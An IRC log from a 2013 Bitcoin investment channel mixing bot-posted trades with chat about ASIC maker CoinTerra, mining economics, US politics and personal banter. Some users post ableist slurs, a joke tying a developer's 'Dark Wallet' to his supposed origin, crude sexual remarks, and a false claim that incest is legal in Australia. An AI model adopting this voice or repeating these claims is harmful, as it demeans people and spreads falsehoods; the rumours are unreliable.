deposits pls Oct 16 18:57:33 if the dentist didn't kill you Oct 16 19:11:54 [HAVELOCK] [AM1] 15 @ 0.56000002 = 8.4 BTC [-] {3} Oct 16 19:12:55 [HAVELOCK] [AM1] 11 @ 0.56000001 = 6.16 BTC [-] {2} Oct 16 19:12:56 [HAVELOCK] [HIM] 2 @ 0.051 = 0.102 BTC [+] Oct 16 19:23:05 [HAVELOCK] [AM100] 186 @ 0.00530324 = 0.9864 BTC [-] {16} Oct 16 19:34:16 [HAVELOCK] [AM1] 1 @ 0.6 BTC [+] Oct 16 19:39:21 [HAVELOCK] [AM1] 3 @ 0.56 = 1.68 BTC [-] {2} Oct 16 19:52:36 [HAVELOCK] [VTX] 1 @ 0.37012 BTC [-] Oct 16 20:05:48 [MPEX] [S.MPOE] 2600 @ 0.00081354 = 2.1152 BTC [-] Oct 16 20:10:53 [HAVELOCK] [AM1] 2 @ 0.56 = 1.12 BTC [-] Oct 16 20:16:59 [HAVELOCK] [AM1] 8 @ 0.56 = 4.48 BTC [-] Oct 16 20:18:00 [HAVELOCK] [AM1] 6 @ 0.55 = 3.3 BTC [-] Oct 16 20:22:03 [HAVELOCK] [AM1] 4 @ 0.55 = 2.2 BTC [-] Oct 16 20:27:08 [HAVELOCK] [LABCO] 888 @ 0.0009831 = 0.873 BTC [+] {2} Oct 16 20:40:21 [HAVELOCK] [B] [XBOND] 100 @ 0.001199 = 0.1199 BTC [+] Oct 16 20:42:23 [HAVELOCK] [AM1] 2 @ 0.55 = 1.1 BTC [-] Oct 16 20:47:28 [MPEX] [S.MPOE] 5850 @ 0.00081596 = 4.7734 BTC [+] Oct 16 20:50:31 [MPEX] [S.MPOE] 1750 @ 0.00081888 = 1.433 BTC [+] Oct 16 20:51:32 [HAVELOCK] [HIM] 5 @ 0.051 = 0.255 BTC [+] Oct 16 20:52:33 [HAVELOCK] [CFIG] 1 @ 0.12699996 BTC [+] Oct 16 20:53:35 [HAVELOCK] [AM1] 10 @ 0.53000001 = 5.3 BTC [-] Oct 16 20:54:35 [HAVELOCK] [AM1] 6 @ 0.52855 = 3.1713 BTC [-] {2} Oct 16 20:55:37 [HAVELOCK] [KCIM] 1 @ 0.415 BTC [+] Oct 16 20:59:41 [HAVELOCK] [CBTC] 1500 @ 0.00019 = 0.285 BTC [-] {4} Oct 16 20:59:42 [HAVELOCK] [HIM] 10 @ 0.051 = 0.51 BTC [+] Oct 16 21:02:44 [HAVELOCK] [AM100] 81 @ 0.00499997 = 0.405 BTC [+] Oct 16 21:03:28 ;;nethash Oct 16 21:03:29 2469083.34273 Oct 16 21:05:28 .d Oct 16 21:05:29 267731249.48242 | Next Diff in 1983 blocks | Estimated Change: 5.2016% in 13d 0h 41m 40s Oct 16 21:05:47 [HAVELOCK] [HIM] 5 @ 0.051 = 0.255 BTC [+] Oct 16 21:06:48 [HAVELOCK] [AM100] 55 @ 0.00499998 = 0.275 BTC [+] Oct 16 21:06:49 [HAVELOCK] [CFIG] 5 @ 0.12699997 = 0.635 BTC [+] Oct 16 21:08:50 [HAVELOCK] [CFIG] 2 @ 0.12699996 = 0.254 BTC [-] Oct 16 21:10:40 ;;bc,tslb Oct 16 21:10:40 Error: "bc,tslb" is not a valid command. Oct 16 21:10:44 ;;tslb Oct 16 21:10:47 Time since last block: 41 minutes and 29 seconds Oct 16 21:11:54 and 2434 Unconfirmed Transactions.. stuff gonna get interesting Oct 16 21:17:55 what the? Oct 16 21:17:59 why so long? Oct 16 21:24:07 kleeck: difficulty jump Oct 16 21:25:45 I didn't realize it adjusted so aggressively. Oct 16 21:25:58 I suppose it expects to be "grown into". Oct 16 21:27:08 [HAVELOCK] [VTX] 1 @ 0.367 BTC [-] Oct 16 21:27:09 [HAVELOCK] [CBTC] 1181 @ 0.00019789 = 0.2337 BTC [+] Oct 16 21:28:09 [HAVELOCK] [NEOBEE] 81 @ 0.002497 = 0.2023 BTC [+] Oct 16 21:28:26 1 hour block isn't unusual Oct 16 21:29:16 yes it's getting better Oct 16 21:30:11 [HAVELOCK] [AM1] 25 @ 0.53 = 13.25 BTC [+] Oct 16 21:30:42 and well, now a block every two minutes. bitcoin's the new litecoin Oct 16 21:31:27 i don't get it Oct 16 21:31:44 get what? Oct 16 21:31:55 because of the lack of confirmation? Oct 16 21:32:08 or faster paced confirmation Oct 16 21:32:18 of faster blocks, yes Oct 16 21:32:53 that was bitcoins advantage of litecoin was the ability to maintain a realistic level of transactions Oct 16 21:38:39 moore's law be damned Oct 16 21:38:44 greedy asic miners Oct 16 21:51:25 lawl Oct 16 21:52:33 [HAVELOCK] [AM1] 1 @ 0.53 BTC [+] Oct 16 21:53:34 [HAVELOCK] [AM100] 30 @ 0.0048 = 0.144 BTC [-] Oct 16 21:55:36 [HAVELOCK] [CFIG] 24 @ 0.12694582 = 3.0467 BTC [-] {3} Oct 16 21:58:40 [HAVELOCK] [CFIG] 35 @ 0.133 = 4.655 BTC [+] Oct 16 21:59:40 [HAVELOCK] [AM100] 35 @ 0.00470015 = 0.1645 BTC [-] {2} Oct 16 22:01:42 [HAVELOCK] [AM1] 23 @ 0.52747826 = 12.132 BTC [-] {5} Oct 16 22:02:43 [HAVELOCK] [NEOBEE] 1000 @ 0.002497 = 2.497 BTC [+] Oct 16 22:05:46 [HAVELOCK] [NEOBEE] 3826 @ 0.00249931 = 9.5624 BTC [+] {2} Oct 16 22:24:05 [HAVELOCK] [AM1] 1 @ 0.58 BTC [+] Oct 16 22:29:10 [MPEX] [S.MPOE] 6155 @ 0.00081495 = 5.016 BTC [-] Oct 16 22:38:19 [HAVELOCK] [NEOBEE] 1860 @ 0.00259451 = 4.8258 BTC [+] {5} Oct 16 22:39:20 [HAVELOCK] [NEOBEE] 310 @ 0.00275644 = 0.8545 BTC [+] {2} Oct 16 22:40:21 [HAVELOCK] [AM1] 7 @ 0.589 = 4.123 BTC [+] {3} Oct 16 22:40:22 [HAVELOCK] [NEOBEE] 1250 @ 0.0027696 = 3.462 BTC [+] {2} Oct 16 22:41:22 [HAVELOCK] [NEOBEE] 80 @ 0.002849 = 0.2279 BTC [+] Oct 16 22:44:25 [MPEX] [S.MPOE] 5300 @ 0.00082114 = 4.352 BTC [+] Oct 16 22:45:26 [HAVELOCK] [AM1] 10 @ 0.59879999 = 5.988 BTC [+] {3} Oct 16 22:52:33 [HAVELOCK] [AM100] 79 @ 0.0047 = 0.3713 BTC [-] {2} Oct 16 22:56:37 [HAVELOCK] [AM100] 600 @ 0.00487791 = 2.9267 BTC [+] {4} Oct 16 23:05:28 wow it is hilariously quiet in this parts Oct 16 23:10:59 so hilarious. Oct 16 23:40:20 [HAVELOCK] [AM100] 34 @ 0.00455897 = 0.155 BTC [-] {4} Oct 16 23:46:14 $vwap ^oix Oct 16 23:46:15 Tom_Servo: An error has occurred and has been logged. Please contact this bot's administrator for more information. Oct 16 23:46:19 :( Oct 16 23:47:34 $help Oct 16 23:47:34 pankkake: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Oct 16 23:47:51 that was unhelpful Oct 16 23:47:59 $help help Oct 16 23:47:59 pankkake: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Oct 16 23:52:46 !ticker m ^oix Oct 16 23:52:47 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 196.1038293 / 196.1038293 (1385 shares, 470.20 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Oct 16 23:54:34 [HAVELOCK] [AM100] 407 @ 0.00450198 = 1.8323 BTC [-] {4} Oct 16 23:56:22 kSLAUGHTER is "Working on our Colored Coins Program." Oct 16 23:57:08 and im busy bugfixing and monkey patching, awaiting irate emails from customers Oct 16 23:57:37 [HAVELOCK] [AM100] 200 @ 0.00479999 = 0.96 BTC [+] {2} Oct 17 00:27:06 [MPEX] [S.MPOE] 4100 @ 0.00082152 = 3.3682 BTC [+] {2} Oct 17 00:33:19 the USA is the new Cyprus http://www.economicpolicyjournal.com/2013/10/chase-bank-limits-cash-withdrawals-bans.html Oct 17 00:39:18 [HAVELOCK] [AM1] 1 @ 0.64989991 BTC [+] Oct 17 00:42:36 Infowars reporting... Oct 17 00:58:37 [MPEX] [S.MPOE] 1318 @ 0.00082029 = 1.0811 BTC [-] Oct 17 01:00:39 [HAVELOCK] [AM1] [PAID] 29.73816216 BTC to 7`374 shares, 403284 satoshi per share Oct 17 01:11:50 [HAVELOCK] [AM1] 1 @ 0.5800001 BTC [-] Oct 17 01:18:57 [HAVELOCK] [AM1] 1 @ 0.5800001 BTC [-] Oct 17 01:24:02 [HAVELOCK] [VTX] 1 @ 0.3611014 BTC [-] Oct 17 01:42:20 [HAVELOCK] [AM1] 1 @ 0.5800001 BTC [-] Oct 17 02:08:17 S.NSA now on live.coinbr.com Oct 17 02:08:38 sigh, should finally kill that and build something passable Oct 17 02:15:53 [HAVELOCK] [AM1] 2 @ 0.561002 = 1.122 BTC [-] Oct 17 02:42:20 [HAVELOCK] [AM1] 1 @ 0.561002 BTC [-] Oct 17 02:43:20 [HAVELOCK] [AM1] 1 @ 0.561001 BTC [-] Oct 17 02:49:23 ;;seen mircea_popescu Oct 17 02:49:23 mircea_popescu was last seen in #bitcoin-assets 10 hours, 33 minutes, and 28 seconds ago: anyway, off to see the dentist. may your next hours be less painful than mine. Oct 17 02:54:41 also: hi Oct 17 02:57:35 [HAVELOCK] [AM1] 5 @ 0.5844 = 2.922 BTC [+] {2} Oct 17 03:01:39 [HAVELOCK] [AM1] 1 @ 0.5611 BTC [-] Oct 17 03:02:40 [MPEX] [S.MPOE] 3800 @ 0.00082153 = 3.1218 BTC [+] Oct 17 03:04:42 [HAVELOCK] [B] [XBOND] 87 @ 0.0012 = 0.1044 BTC [+] Oct 17 03:05:43 [MPEX] [S.MPOE] 2850 @ 0.00082187 = 2.3423 BTC [+] {2} Oct 17 03:12:50 [HAVELOCK] [B] [XBOND] 85 @ 0.0012 = 0.102 BTC [+] {2} Oct 17 03:13:50 [HAVELOCK] [AM1] 2 @ 0.56100001 = 1.122 BTC [-] {2} Oct 17 03:14:51 [HAVELOCK] [AM1] 1 @ 0.6395 BTC [+] Oct 17 03:17:54 [HAVELOCK] [AM1] 2 @ 0.56105001 = 1.1221 BTC [-] {2} Oct 17 03:39:15 [HAVELOCK] [AM1] 2 @ 0.56100001 = 1.122 BTC [-] Oct 17 03:40:16 [MPEX] [S.MPOE] 1017 @ 0.00082029 = 0.8342 BTC [-] Oct 17 03:53:29 [HAVELOCK] [AM1] 4 @ 0.562 = 2.248 BTC [+] Oct 17 04:02:42 ;;nethash Oct 17 04:02:42 2421866.55514 Oct 17 04:04:41 [MPEX] [S.MPOE] 2003 @ 0.0008142 = 1.6308 BTC [-] {2} Oct 17 04:10:47 [MPEX] [S.MPOE] 1334 @ 0.00081947 = 1.0932 BTC [+] {2} Oct 17 04:14:54 asciilifeform http://trilema.com/2013/snsa-first-product-the-cardano/#comment-95594 Oct 17 04:15:33 mircea_popescu: answered (a little less harshly) Oct 17 04:16:16 there's basically this stable of people i've humiliated over the years who somehow inexplicably figure that if they make the same types of mistakes moar Oct 17 04:16:18 it'll all wash. Oct 17 04:17:27 didn't know the chap was a catalogued troll Oct 17 04:18:04 he's not really a catalogued troll, he's this kid who figures he's pretty smart Oct 17 04:18:15 who knows, in his social circle perhaps he is. obviously bitcoin is a little more demanding. Oct 17 04:31:07 [HAVELOCK] [SMG] 659 @ 0.00017222 = 0.1135 BTC [-] Oct 17 04:34:09 [HAVELOCK] [SMG] 1818 @ 0.000151 = 0.2745 BTC [-] {3} Oct 17 04:36:11 [HAVELOCK] [AM100] 20 @ 0.00515049 = 0.103 BTC [-] {3} Oct 17 04:37:12 [HAVELOCK] [AM1] 1 @ 0.562 BTC [+] Oct 17 04:40:15 [HAVELOCK] [AM1] 1 @ 0.562 BTC [+] Oct 17 04:47:22 [HAVELOCK] [CBTC] 3943 @ 0.0001937 = 0.7638 BTC [-] {3} Oct 17 04:50:25 [HAVELOCK] [AM100] 81 @ 0.00514023 = 0.4164 BTC [-] {4} Oct 17 04:53:28 [HAVELOCK] [AM100] 66 @ 0.00479075 = 0.3162 BTC [-] {2} Oct 17 04:54:29 [HAVELOCK] [AM1] 1 @ 0.5995 BTC [+] Oct 17 04:54:30 [MPEX] [S.MPOE] 8300 @ 0.00082663 = 6.861 BTC [+] {3} Oct 17 05:05:18 Anyone have the scoop on CoinTerra? Oct 17 05:05:32 I was told my an unreliable source that they may not be meeting their hefty NRE payment. Oct 17 05:06:04 kleeck we might have been told the same by the same unreliable source. Oct 17 05:06:13 :) Oct 17 05:06:21 I was hoping for a real source! Oct 17 05:06:30 I'll scour the googlenets. Oct 17 05:06:46 nothing factual afaik. might ask the guy for your blog. Oct 17 05:07:05 There is a reason I did not write a article Oct 17 05:07:27 What blog is that? Oct 17 05:07:49 jborkl, do you know anything about this? Oct 17 05:07:57 is it all "leaked" info or what? Oct 17 05:08:14 I went by and saw them in person Oct 17 05:08:31 Oh? Oct 17 05:08:54 And they were all running around, scrounging for change in the couch cushions? Oct 17 05:09:32 lol Oct 17 05:10:01 "We're only $3,000,000 shy of making the NRE payment!" Oct 17 05:10:05 No, they were professional and spent time answering questions Oct 17 05:10:25 I'd expect as much. Oct 17 05:10:30 What news did they offer you? Oct 17 05:10:48 Well I stopped by unexpected Oct 17 05:11:07 Did you write this up somewhere? I heard this from the infamous iCEBREAKER. Oct 17 05:11:15 But, there were a few things keeping me from placing a order Oct 17 05:11:24 Do tell! Oct 17 05:12:34 The main thing, they expected to be a 100 to 200 million company, I asked what else they were making besides BTC miners and they didn't have a answer Oct 17 05:13:26 Wha... Oct 17 05:13:47 I just do not that is realistic since 28nm is the end of the road for now Oct 17 05:14:21 Did they state that they have a $5M NRE payment? Oct 17 05:14:40 No, but I did not ask about that Oct 17 05:14:55 Hm. I'm wondering where this rumour came from. I can't find any verification. Oct 17 05:16:37 That does sound correct. I have a good friend that works in worldwide high temp chip. I brought up making bitcoin Asic- he ran through the math for me and it did not work Oct 17 05:16:52 [HAVELOCK] [AM1] 1 @ 0.5621 BTC [-] Oct 17 05:17:02 Unless you were first and took preordees Oct 17 05:17:06 Orders Oct 17 05:18:02 He thought $10 million to get a 28nm to market was a fair back of the napkin # Oct 17 05:18:44 why didn't you publish your ct reportß Oct 17 05:19:28 Because I don't know what to say. I can not figure out if it is one or the other Oct 17 05:19:43 They are using a plant in Taiwan for sure Oct 17 05:19:57 Well, that is the plab Oct 17 05:20:00 Plan Oct 17 05:20:23 But tape out is late Oct 17 05:21:20 Did they say why? Oct 17 05:21:50 I can not figure out if it is one or the other << so what is the ,"one" and the "other"? Oct 17 05:22:58 [MPEX] [S.MPOE] 3800 @ 0.00082273 = 3.1264 BTC [-] Oct 17 05:23:04 http://imgur.com/3lHoIcQ Oct 17 05:23:05 imgur: the simple image sharer Oct 17 05:23:10 where the fuck did i get that link from ? Oct 17 05:23:34 i dont even Oct 17 05:23:47 No, but I can run through some basic math, from custom mining stuff I picked up today Oct 17 05:24:58 a nm found it. Oct 17 05:25:03 $320 for a board - populated and assembled. 38 GH - 15 for a clearance cooler- 15 for 1/6 of a power supply Oct 17 05:25:43 And $5 misc before you buy chips. The only way it works out is if the chips are almost free Oct 17 05:26:01 [HAVELOCK] [AM1] 5 @ 0.5612 = 2.806 BTC [-] {2} Oct 17 05:26:24 So, you can not dump $10 million at this point into development for a faster process Oct 17 05:26:35 It makes no sense Oct 17 05:27:08 jborkl_ i suspect a good chunk of the people mining today are mining to obtain bitcoin, not to obtain dollars. Oct 17 05:27:17 ^ Oct 17 05:27:17 as the old saying goes, "money is no object" Oct 17 05:27:38 It depends on the miner's goal. Oct 17 05:27:41 True but they want VC money and a VC valuation Oct 17 05:28:05 yeah, this is no argument re what you were saying about cointerra Oct 17 05:28:10 That will be difficult. THey are about three to six months too late for that, imo. Oct 17 05:28:22 but in the more general form, "you can not dump $10 million"... well, depends who you are. Oct 17 05:28:34 Well that is true mp Oct 17 05:29:00 I can only say if it makes sense to me Oct 17 05:30:07 You have to keep in mind that there are miners who believe that a Bitcoin will be orders of magnitude more valuable then it currently is. So present day ROI (in fiat) isn't an issue for them. Oct 17 05:31:24 especially iof the miners come as a business expense. Oct 17 05:32:12 Well, I know of in private hands- 4000 BFL chips that have no home Oct 17 05:32:24 That is just what I know of Oct 17 05:33:09 part of friedcats business has been selling big coin Oct 17 05:33:36 And what I picked up today is top notch for less than $400 (not including chips) Oct 17 05:34:43 Size of a postcard, maybe a little bigger Oct 17 05:34:54 Oversized postcard Oct 17 05:37:10 shits gonna start becoming a hobby even for chip manufacturers\ Oct 17 05:38:35 thisngs are quickly approaching a point where savings in chip manufacturing will have a huge impact on profitabilty Oct 17 05:40:59 yah Oct 17 05:41:52 They were nice, had a real office in a nice building. I think the plan is to really make something Oct 17 05:42:02 who dat? Oct 17 05:42:17 [MPEX] [S.MPOE] 1800 @ 0.00082273 = 1.4809 BTC [-] Oct 17 05:42:17 Oh where this conv really started Oct 17 05:42:25 Cointerra Oct 17 05:42:28 terra? Oct 17 05:42:32 yah Oct 17 05:42:37 you bought hw? Oct 17 05:42:54 I just can not put all the math together to make it work for them Oct 17 05:43:19 noone has made the pro hardware that become derigeiure yet Oct 17 05:43:23 Buy that is my worry, from what I have seen in the past in btc Oct 17 05:44:06 terra and am are positioned to make that excellent hardware in my drunken opinion Oct 17 05:46:24 to design something now that wont last a few years is throwing money away Oct 17 05:50:35 Well, that very well could be Oct 17 05:50:47 http://www.sea-doo.com/watercraft/sea-doo-spark.html Oct 17 05:50:49 Spark 2- or 3-Seat Personal Watercraft: Easy to Ride, Perfect for Family Fun | Sea-Doo US Oct 17 05:51:20 half the price of a normal seadoo, same power to weight, half the energy conspumption Oct 17 05:51:38 good design Oct 17 05:53:28 [HAVELOCK] [CBTC] 42314 @ 0.00017178 = 7.2687 BTC [-] {11} Oct 17 05:54:06 theres no money in rushing a half arsed design to market naymore Oct 17 05:54:29 [HAVELOCK] [CBTC] 7686 @ 0.000167 = 1.2836 BTC [-] Oct 17 05:54:38 amen to that. Oct 17 05:56:31 [HAVELOCK] [CBTC] 50000 @ 0.0001532 = 7.66 BTC [-] {12} Oct 17 06:03:16 .d Oct 17 06:03:16 267731249.48242 | Next Diff in 1909 blocks | Estimated Change: 23.7543% in 10d 2h 11m 36s Oct 17 06:04:14 its interesting to see these industrial innovations changing the new reserve currency as america loses it's grasp that was built with industrial innovation Oct 17 06:05:34 i enjoyed reading the retartdation of the us socialists Oct 17 06:06:02 "we hope the evil people insisting we stop spending money we don't have learned their lesson!!! we can never be convinced to put away the credit card!!!" Oct 17 06:06:08 can you distill it for me here? Oct 17 06:07:27 and when the welfare runs out all the expenses go on actual credit cards? Oct 17 06:08:09 https://bitcointalk.org/index.php?topic=260225.20 Oct 17 06:08:11 The biggest thief in the Bitcoinica debacle? MtGox Oct 17 06:08:15 the drama that just won't die Oct 17 06:08:18 until the bank calculates that all your shitty possessions arent worth a pinch of shit Oct 17 06:08:31 Vexual well... that looks like 2014 really. Oct 17 06:08:56 and the three retarded children are a liability Oct 17 06:09:05 im curious who the bagholders will be. amusingly, it'll prolly be places like iran Oct 17 06:09:15 how so? Oct 17 06:09:51 well the chinese are divesting themselves slowly of us paper, Oct 17 06:09:54 i know i don't hold any Oct 17 06:10:20 watch communist korea be the main foreign holder of us issued bonds or some shit. Oct 17 06:10:40 aust has direct currency trading with china since a few months Oct 17 06:10:47 usa didnt even notice Oct 17 06:11:22 its legal to have sex with your daughter now in australia or uncle Oct 17 06:11:24 or they said" fair enough" Oct 17 06:12:12 i doubt that slovakistan Oct 17 06:13:40 what may surprise you, is that it is legal here for the police to beat you to death without a trial. Oct 17 06:14:13 so many similaities with outr geographical neighbours here in se asia Oct 17 06:18:42 and theres a maximum iq for police officers, work that out if were not someones evil experiment into police states Oct 17 06:22:34 luckily we have some that act dumb to get in Oct 17 06:27:55 compare that to a similar organisation such as hezbollah Oct 17 06:28:02 i thought they took 30 points off if you expressed an interest in a career in law enforcement Oct 17 06:29:41 well i guess it depends on the test, it's a two way street Oct 17 06:31:08 Who all is disturbed by Taaki's spurt of activity seemingly to rehabilitate himself? Oct 17 06:32:02 whats a taaki? Oct 17 06:33:12 perhaps you have touched on an allusion i am making Oct 17 06:33:51 while the foam from aust pol and hezbollah reaches a similar height in politics, the input changes the output Oct 17 06:34:15 and in bitcoin we have a unique, as yet untyested case Oct 17 06:35:06 my hypothesis is that bitcoin is quite unstoppable Oct 17 06:36:46 Vexual http://trilema.com/2012/amir-taaki-has-done-and-continues-to-do-huge-disservice-to-anyone-serious-involved-in-bitcoin/ Oct 17 06:38:37 i read thge last line, too stupid to live Oct 17 06:39:46 works. Oct 17 06:39:54 hahaha Oct 17 06:40:01 that whole last paragraph is a gas Oct 17 06:40:09 thanks for the distillation, i was irked by reading ums and ahs Oct 17 06:40:19 "like uh…" Oct 17 06:43:09 So here you have like a currency, which started out from zero dollars, and there was an example like somebody bought pizza, for like thirty thousand bitcoins, and now each bitcoin is worth like ten dollars. And the reason is, is a lot of these people who are like technological people, they look at this system and they say (she says?) like wow this has like massive potential. Oct 17 06:43:39 it's really very high grade stupid distillate. Oct 17 06:43:46 First there's Taaki's Darkwallet project (Whatever the fuck makes a wallet dark, is it the melanin?) then there's his recent surge in activity on the forum. Oct 17 06:43:47 lel Oct 17 06:44:00 like wow! Oct 17 06:44:14 BingoBoingo it's a dark wallet cause he's from morocco or w/e. Oct 17 06:44:30 heres a simple maths question Oct 17 06:44:42 if i have 0 funds Oct 17 06:45:05 no. Oct 17 06:45:06 then everyday for one year i earn 0.05 more than the day before, how much do I have after one year? Oct 17 06:45:08 mircea_popescu: Honestly I though it was a dark wallet because even light can't escape the gravity pulling them coinz to his wallet. Oct 17 06:45:19 if you have 0 funds the only answer for you is no. Oct 17 06:45:21 lol Oct 17 06:45:38 ok i start with 0.05 then, if you find it incomprehensible Oct 17 06:45:56 ;;calc 365*364/2 *0.05 Oct 17 06:45:56 3321.5 Oct 17 06:46:07 fast Oct 17 06:46:50 i like how you cant do 365*365 Oct 17 06:46:56 straight pimpin Oct 17 06:47:24 pimptax error Oct 17 06:47:39 you're drunk aren't you. Oct 17 06:47:47 two nights in a row! Oct 17 06:47:50 cant play with 0 Oct 17 06:48:04 i don't talk to you every time im drunk Oct 17 06:48:27 "I am sure the lawyer is not intentionaly commiting purgery" Oct 17 06:48:41 i didn't know ver can't speal. Oct 17 06:49:04 pergery is lawyer surgery Oct 17 06:49:05 ;;wk purgation Oct 17 06:49:06 http://en.wiktionary.org/wiki/purgation | English[edit]. Noun[edit]. purgation (plural purgations). the act of purging, especially by the use of a purgative · cleansing from sin or guilt. Retrieved from ... Oct 17 06:49:07 purgation - Wiktionary Oct 17 06:49:21 dissecting the real Oct 17 06:49:56 mircea_popescu: Since there are many months until my next court date I took your advice. I've demoted the drive through counsel to paralegal. Oct 17 06:50:43 is she hot ? Oct 17 06:51:21 mps lawyer tries hard to get him bail Oct 17 06:52:43 "but some people are under the mistaken assumption we (Intersango) were some kind of rich company" Oct 17 06:53:19 i thought it was n(n+1)/2? Oct 17 06:53:43 lol this is funnay. "o noes, some people are under the mistaken assumption we were a company and like really cool and professional and rich and shit, which is what we were trying to falsely project all along! o noes, and in fact we went splat on the cold sidewalk of reality and now our own web of lies is fucking us in the butt! how unfair!" Oct 17 06:53:53 nubbins` mircea_popescu> you're drunk aren't you. Oct 17 06:54:04 mircea_popescu: The actual paralegal at the firm is. The drive-through attourney is a dude so any orgasms would have to be strictly a power thing. Oct 17 06:54:26 BingoBoingo therein lies the proof he has more experience than you. HIS paralegal is hot. Oct 17 06:54:29 depends on whether it's a leap year too, i guess Oct 17 06:54:54 one is always at an advantage when ones counsel has a vested interest in your success by measure of their own quality of life Oct 17 06:55:21 mircea_popescu: That doesn't speak for his competency though... He apparently spends more on her than the building or his "family"... Oct 17 06:55:38 maybe she's worth it. Oct 17 06:55:46 mircea_popescu: Probably Oct 17 06:55:52 by definition Oct 17 06:56:30 [HAVELOCK] [AM1] 1 @ 0.5995 BTC [+] Oct 17 06:57:07 mircea_popescu: He sniped her away from the State's attourney's office when he left there. Oct 17 06:57:47 cokeheads next door sound like they're throwing each other at the walls Oct 17 06:57:51 the one da that absolutely hated me of the numerous das that didn't like me Oct 17 06:57:59 could never get past the fact that i took his secretary. Oct 17 06:58:09 the woman was probably the best at her job i ever met. Oct 17 06:58:18 sounds like a mcafee story mp Oct 17 06:58:23 lel Oct 17 06:58:35 oh ?! Oct 17 06:58:38 nubs you need a sorcerer? cokes heads are easy Oct 17 06:58:47 did you bury yourself in sand and place a box over your head when the da came to find his secretary? Oct 17 06:59:33 [HAVELOCK] [AM1] 1 @ 0.6 BTC [+] Oct 17 06:59:42 ill have those cokeheads out and a tasty first year science student in there by two weeks Oct 17 07:00:00 no self-respecting science student would move in there, it's a dive Oct 17 07:01:01 nubbins`: Graduate students might move there, I hear they lack self respect... Oct 17 07:01:14 masochists can still have self respect Oct 17 07:02:13 nubbins`: Real masochists are probably the minimum required to be people. Of course they have self respect. Oct 17 07:04:11 give me the general sector, ive got butterflies that make daenerys targaryen and her dragons look like a downs syndrome eating sand Oct 17 07:04:21 nubbins`: A good masochist is at the least going to have a solid sense of who to submit to. Oct 17 07:04:56 whereas your average grad student doesn't even get that much Oct 17 07:06:06 nubbins`: Nope, the average grad student must submit to whoever they are stuck with. Oct 17 07:06:38 i made some laser patents for my uni when i was there Oct 17 07:07:14 they never even degreed me Oct 17 07:07:17 cunts Oct 17 07:07:39 if i'd known better, i wouldn't have gone to university Oct 17 07:08:01 same here Oct 17 07:08:14 took 4 years to work that out Oct 17 07:08:23 6! Oct 17 07:08:26 for me Oct 17 07:09:02 the hecs debt taught me enough about tax minimisation to make it worthwhile Oct 17 07:09:30 heh. my debt drove me halfway across the globe Oct 17 07:09:44 thats a good thing? Oct 17 07:09:52 in retrospect, yes Oct 17 07:10:08 its just life, its what you get Oct 17 07:11:00 agreed Oct 17 07:11:19 although it's nice to now have a much bigger say in what i get Oct 17 07:11:57 nubbins` lolwut ? he never came. Oct 17 07:12:06 i just paid her more. a lot more. Oct 17 07:12:18 ah, i was making a mcaffee joke Oct 17 07:12:27 that's how he sez he slipped past the cops Oct 17 07:12:31 o Oct 17 07:12:41 i must have been missing out on something with this mcafee stuff Oct 17 07:12:44 mcafee i9s my hero Oct 17 07:12:50 it was priceless. Oct 17 07:13:19 3 or 4 essays in, the news sites started getting the feeling that the guy was completely unhinged Oct 17 07:13:36 I wonder how long it will take for McAffee to become a regular here if he doesn't relapse into the bath salts. Oct 17 07:13:40 haha Oct 17 07:13:53 he probably frequents -otc Oct 17 07:14:54 nubbins`: Still, could be worse he could frequent -dev Oct 17 07:15:00 he only had bathsalts coz he was in belieze Oct 17 07:15:18 im sure hes back on the peruvian flake now Oct 17 07:15:54 what a freak Oct 17 07:16:00 bold video tho Oct 17 07:16:24 brassy as a doorknob! Oct 17 07:16:59 like i said when burnside shut down, that cat knows how to belieze Oct 17 07:17:54 one more session for me before bed Oct 17 07:18:09 have to put together a proof of a book tomorrow Oct 17 07:18:36 Vexual: There's were no problems with Belize in that situation though. All of the problems were with Burnside. Oct 17 07:19:46 yes, but he could have moved to belieze and got a lab in his shed if he wanted with the coin that site was making Oct 17 07:20:16 think of the boxes under which he could hide! Oct 17 07:20:30 why anyone would want to stay in america with internet income is beyond me Oct 17 07:21:16 now that's just silly Oct 17 07:21:51 i mean think about it, your friends and relatives are american! whats the point Oct 17 07:22:32 maybe only 98% or world popuation get it Oct 17 07:23:30 theres a whole fantastic world out there Oct 17 07:23:56 http://www.youtube.com/watch?v=-WCFUGCOLLU Oct 17 07:23:57 Take The Money And Run - The Steve Miller Band (Lyrics + HQ) - YouTube Oct 17 07:24:05 this may come as a surprise, but most people have no particular interest in leaving the place they were born and raised in Oct 17 07:24:07 now fuck off dubs its one wideo Oct 17 07:24:22 not me, i get itchy feet Oct 17 07:24:38 well, we're in the minority Oct 17 07:24:45 you too? Oct 17 07:25:03 big world, lots to see Oct 17 07:26:03 we really live in the best time ever Oct 17 07:26:59 eh, who's to say Oct 17 07:27:38 i liked some of the previous best times ever better. Oct 17 07:27:55 i can be anywhere on earthg tommorrow for fuck all money Oct 17 07:28:18 and bitcoin Oct 17 07:29:24 depends how hard one loses Oct 17 07:29:43 do they sob, or just become angry? Oct 17 07:30:03 [HAVELOCK] [AM1] 5 @ 0.6 = 3 BTC [+] {2} Oct 17 07:30:18 i see everything as a win, but im unstable Oct 17 07:30:25 so you fuck a girl in the small hole. next morning, ask her how she feels. "sore, it's nice." Oct 17 07:30:28 true story. Oct 17 07:30:37 i don't think sore losers are as much a problem as stupid losers are. Oct 17 07:31:08 thats a sore winner Oct 17 07:32:09 another sign of the beautiful times, the sexual revolution has already happened Oct 17 07:33:09 mircea_popescu: Well, I mean sore losers can learn. Stupid losers can't. The point of having lost is losing hurts. The sore loser wants to win because being sore sucks. Missing the championship sucks. The stupid loser just thinks they forgot to bring the right totems of luck or some shit. Oct 17 07:33:19 now if you want your back door slammed so hard it hurts, its your perrogative Oct 17 07:33:30 something like that Oct 17 07:34:32 i cant even get vanned coz ive got a van sized hole and a big fuckin excavator Oct 17 07:37:33 So... I though I read this earlier, but is smidge Usagi? Oct 17 07:38:24 I mean no offense if smidge isn't. I mean Usagi is one of the dirtiest words in BTC. Oct 17 07:38:49 smidge is smidge Oct 17 07:39:40 he goes to work and buys up or down Oct 17 07:39:47 so whats the effin deal with labcoin.... if they are scamming why am i still getting divs lol Oct 17 07:39:48 someone said so, i said i didn't believe so, Oct 17 07:39:55 x is usagi is sort of a running joke here Oct 17 07:40:06 